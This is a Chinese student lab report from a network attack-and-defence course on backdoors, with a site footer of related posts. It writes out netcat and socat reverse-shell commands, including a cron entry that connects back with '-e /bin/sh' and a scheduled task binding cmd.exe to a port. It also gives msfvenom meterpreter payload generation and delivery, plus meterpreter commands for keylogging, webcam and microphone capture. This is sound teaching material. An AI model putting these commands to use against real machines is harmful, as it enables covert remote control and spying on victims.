# 2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践
2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践
1.实验准备
一、实验说明
任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
二、问题回答
- 问:例举你能想到的一个后门进入到你系统中的可能方式?
- 在下载东西时候没有从官方网站,有捆绑软件或后门
- 问:例举你知道的后门如何启动起来(win及linux)的方式?
- win:修改注册表、引诱我们点击从而执行
lunix:绑定注入shellcode开启后门 - 问:Meterpreter有哪些给你映像深刻的功能?
- 远程控制摄像头、键击等用户关键信息
实验过程记录
任务一:Windows获得Linux Shell
在Windows下使用
ipconfig
查看本机IP:
使用ncat.exe程序监听本机的5319端口
在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5319端口
成功获得Kali的shell,如下图所示:
任务二:Linux获得Windows Shell
1. 在Kali环境中使用ifconfig查看IP
2. 使用nc指令监听`5319`端口
3. 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的`5319`端口
4. Kali下可以看到Windows的命令提示,可以输入Windows命令:
任务三:使用nc传输数据
1. Windows下监听5319端口:
2. Kali下连接到Windows的5319端口:
3. 传输数据:
3. Meterpreter
任务一:使用netcat获取主机操作Shell,cron启动
在Windows系统下,监听5319端口
用
crontab -e
指令编辑一条定时任务,选择第三个选项:
在最后一行添加48 * * * * /bin/netcat 192.168.3.103 5319 -e /bin/sh,意思是在每个小时的第48分钟反向连接Windows主机的5319端口:(注意是虚拟机的时间):
当时间到了,此时已经获得了Kali的shell,可以输入指令:
任务二:使用socat获取主机操作Shell, 任务计划启动
相关知识:
- socat是ncat的增强版,它使用的格式是socat [options]
,其中两个address是必选项,而options 是可选项。 - socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
实验过程
1.Windows+X,然后选择“控制面板”(win8下打开控制面板)
2.右上角“查看方式”选择“大图标”
3.点击管理程序->点击任务计划程序
4.选择上方菜单栏中的“操作”->“创建任务”
5.输入任务名
6.新建触发器,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5319 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5319,同时把cmd.exe的stderr重定向到stdout上
7.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
8.socat - tcp:192.168.3.103:5319,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5319端口,此时可以发现已经成功获得了一个cmd shell:(此处的IP地址为WindowsIP)
任务三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.132 LPORT=5319 -f exe > backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“backdoor.exe”
2.在Windows下执行ncat.exe -l 5319 > 20155312_backdoor.exe,这样被控主机就进入了接收文件模式
3.在Linux中执行nc 192.168.50.132 5319 < backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP
4.传送接收文件成功,如下图所示:
5.在Kali中打开一个终端,使用msfconsole指令进入msf控制台
6.接着输入use exploit/multi/handler使用监听模块,设置payload
7.set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload
8.set LHOST 192.168.50.132,这里用的是LinuxIP,和生成后门程序时指定的IP相同
9.set LPORT 5319,同样要使用相同的端口
10.关闭所有杀毒软件,并开始监听
四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用record_mic指令可以截获一段音频:(可以+“-d 时间”来设定录制时间)
- 使用webcam_snap指令可以使用摄像头进行拍照
- 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
- 使用screenshot指令可以进行截屏
拍照后用ncat把图片传到电脑
实验中遇到的问题
1.在设置每多少分钟启动时是虚拟机的时间,不是电脑本身的时间:
2.msfconsole启动的时候出现问题:
百度了答案:是因为kali2.0的取消了metasploit的数据库
https://www.cnblogs.com/Hi-blog/p/6795811.html
# 2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 <网络对抗技术>Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0. ...
- 2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Sh ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
随机推荐
- 绝版Node--Sequlize搭建服务(Node全栈之路)
绝版Node--Sequlize搭建服务(Node全栈之路) 参考资料:https://itbilu.com/nodejs/npm/VkYIaRPz-.html 准备环境:Mysql,Node 前沿: ...
- 在PHP中避免一些代码中的坏味道
做PHP开发已经有快一年的时间了,在这一年的时间中,学习了很多生产环境中的技巧,学习了很多东西,期间也阅读了一些优秀的源码和关于代码的书,对写代码这一块有了一定的思考,也看过很多别人写的好的代码和坏的 ...
- 使用Eclipse Debug的一些说明
目录 Debug视图 线程堆栈视图 变量视图 断点视图 表达式视图 代码视图 远程Debug 异常断点 条件断点 表达式 Debug定位第三方插件的问题 Debug一些经验 Debug视图 认识d ...
- Oracle EBS CST 成本请求报错
(文档 ID 430533.1) When running CMCPAW, Periodic Actual Cost Worker, an error is received in the logf ...
- HTML table固定表头
最近尝试了几种HTML的table固定表头的方法..额...各有利弊,但很尴尬..... 1.thead和tbody的display设置为block; 这种可以实现,但是需要提前设置好每个th和td的 ...
- Jmeter用于接口测试中【接口耦合关联的实现】
Jmeter用于接口测试时,后一个接口经常需要用到前一次接口返回的结果,应该如何获取前一次请求的结果值,应用于后一个接口呢,拿一个登录的例子来说明如何获取. 1.打开jmeter, 使用的3.3的版本 ...
- 像azure一样桌面显示Windows系统信息
介绍 我们在使用azure的公有云时,可以看到打开虚拟机时右上角可以显示系统配置信息和公网私有地址,很好奇如何做到的,终于经过询问一位微软的朋友,他帮我找到了这个工具 工具地址:https://tec ...
- Linux 文本处理命令
最近在使用 BASH 进行处理 文本文件的时候,对于文本处理真的是力不从心,今天进行搜集一下linux 中文本处理相关的命令,这样你在进行书写shell 脚本的时候,就能写出更好的方案. 命令搜集: ...
- security/pam_appl.h:没有那个文件或目录
在编译开源库时, 提示 pam.h:4:10: 致命错误:security/pam_appl.h:没有那个文件或目录 #include <security/pam_appl.h> 解决方法 ...
- DLL导出类避免地狱问题的完美解决方案
DLL动态链接库是程序复用的重要方式,DLL可以导出函数,使函数被多个程序复用,DLL中的函数实现可以被修改而无需重新编译和连接使用该DLL的应用程序.作为一名面向对象的程序员,希望DLL可以导出类, ...